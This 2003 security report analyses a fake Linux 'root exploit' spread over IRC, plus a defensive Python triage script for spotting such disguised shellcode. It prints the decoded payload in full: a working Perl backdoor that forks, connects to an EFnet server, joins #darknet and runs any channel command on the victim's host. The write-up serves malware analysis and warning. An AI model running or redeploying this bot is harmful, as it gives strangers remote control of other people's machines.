Reports | Reverse command execution exploit via IRC analysis {15th Jun 2003}
Back in May, Rootsecure.net reported how "hackers" were distributing code on the pretence of it being a remote exploit or similar, which in fact exploited the user who ran it by, for example, adding a new root account or deleting files.

Since then a further, arguably more dangerous, so-called exploit has come to light which, if successfully executed, grants anyone control of the host machine via IRC, the same method used to distribute it. It was advertised with the message "new root exploit is out to slackware 9.1 and redhat 9.1! enjoy....be nice to your frinds boxes!" and a link to http://home.no/exploited/exploits/kmodaxx.c.

The link contains realistic-looking source code written in C, along with a block of shellcode. The shellcode (executed by the C code) decodes to the following Perl script:
#!/usr/bin/perl
# Hard-coded IRC rendezvous point: channel, nickname and server.
$chan="#darknet";
$nick="moron";
$server="efnet.vuurwerk.nl";
$SIG{TERM}={};
# Detach into the background so the bot outlives the "exploit" that launched it.
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET->new($server.":6667")||exit;
print $sock "USER moron +i moron :moronv2\nNICK moron\n";
$i=1;
# Read registration replies: 001 = welcome, 433 = nickname in use (append a counter and retry).
while(<$sock>=~/^[^ ]+ ([^ ]+) /){
    $mode=$1;
    last if $mode=="001";
    if($mode=="433"){
        $i++;
        $nick=~s/\d*$/$i/;
        print $sock "NICK $nick\n";
    }
}
# Join the channel and announce the compromised host.
print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";
while (<$sock>){
    if (/^PING (.*)$/){
        print $sock "PONG $1\nJOIN $chan\n";
    }
    # Any channel message of the form "<nick>: <command>" is run via backticks
    # and its output is echoed back to the channel one line per second.
    if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
        s/\s*$//;
        $_=`$_`;
        foreach (split "\n") {
            print $sock "PRIVMSG $chan :$_\n";
            sleep 1;
        }
    }
}
#chmod +x /tmp/hi 2>/dev/null;/tmp/hi
The Perl script connects to the IRC server "efnet.vuurwerk.nl", joins the channel "#darknet", and issues the message:

Hi, Im a moron that ran a fake 0day exploit. v2
to run commands on me, type: moron: command

To first discover whether anyone was actually in the channel and willing to take advantage of those who had run the "exploit", Rootsecure.net ran a modified version of the code which simply connected and logged all messages to the console. A number of commands were sent to the bot, including "ls" and a CTCP VERSION request, most likely in an attempt to confirm that it was a host that had run the script and not simply someone on mIRC pretending to be one.

Since there was interest in the bot, a honeypot machine was set up running the original Perl script. By this time, however, the #darknet channel had begun issuing the message "Nick/channel is temporarily unavailable", preventing anyone from joining.

Note: To decode the shellcode using Perl, open a new file, type $code=, copy over the shellcode lines adding a full stop (Perl's string concatenation operator) after each quoted line, append $code =~ s/;/;\n/g; print $code; to the end of the file, then execute it.
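The Note above describes decoding the shellcode by hand in Perl. As an added triage example (not code from the report or from the kmodaxx.c file), the Python below does the same job from the defender's side: it pulls the adjacent string literals out of a C char[] initialiser, decodes the C escapes, and flags a "shellcode" blob that is really a script carrying IRC command-and-control markers. The embedded C fragment is a constructed sample shaped like such a file, not the original.

```python
import re

# Constructed sample shaped like the fake-exploit file the report describes: a C "shellcode"
# array whose bytes are really a Perl script. It is not the kmodaxx.c from the page.
SAMPLE_C = r'''
char shellcode[] =
    "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
    "use\x20IO::Socket;"
    "print $sock \"\120RIVMSG $chan :$_\";"
    "\x24\x5f\x3d\x60\x24\x5f\x60\x3b";
'''

_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "a": "\a", "b": "\b", "f": "\f",
            "v": "\v", "\\": "\\", '"': '"', "'": "'"}
_ESC_RE = re.compile(r'\\(x[0-9a-fA-F]{1,2}|[0-7]{1,3}|.)', re.S)
_LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)
_ARRAY_RE = re.compile(r'char\s+\w+\s*\[\s*\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);', re.S)
# Markers a Perl IRC backdoor of the shape shown above cannot avoid carrying.
INDICATORS = [b"#!/usr/bin/perl", b"IO::Socket", b"PRIVMSG", b"NICK ", b"JOIN ", b"`$_`", b":6667"]


def decode_c_string(body: str) -> bytes:
    """Decode the inside of a C string literal: \\xHH, octal \\ooo, and \\n, \\", ..."""
    def one(m: re.Match) -> str:
        esc = m.group(1)
        if esc[0] == "x":
            return chr(int(esc[1:], 16))
        if esc[0] in "01234567":
            return chr(int(esc, 8) & 0xFF)
        return _ESCAPES.get(esc, esc)          # unknown escape: keep the character
    return _ESC_RE.sub(one, body).encode("latin-1")


def extract_shellcode(c_source: str) -> bytes:
    """Concatenate the adjacent string literals of the first char[] initialiser."""
    m = _ARRAY_RE.search(c_source)
    if not m:
        raise ValueError("no char[] string initialiser found")
    return b"".join(decode_c_string(lit) for lit in _LITERAL_RE.findall(m.group(1)))


def triage(payload: bytes) -> dict:
    """Say whether a 'shellcode' blob is really text and which IRC/backdoor markers it carries."""
    text = sum(1 for b in payload if 32 <= b < 127 or b in b"\n\r\t")
    ratio = round(text / max(len(payload), 1), 2)
    return {"printable_ratio": ratio,
            "looks_like_script": ratio > 0.95 and payload.startswith(b"#!"),
            "indicators": [i.decode() for i in INDICATORS if i in payload]}
```

Real machine code scores a low printable ratio and no markers; a decoded Perl bot of this family scores near 1.0 with the shebang, IO::Socket and PRIVMSG markers present.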
Related Links:
Hackers Hack 'Script Kiddies', Rootsecure.net
-1 day exploit - Warning, Full Disclosure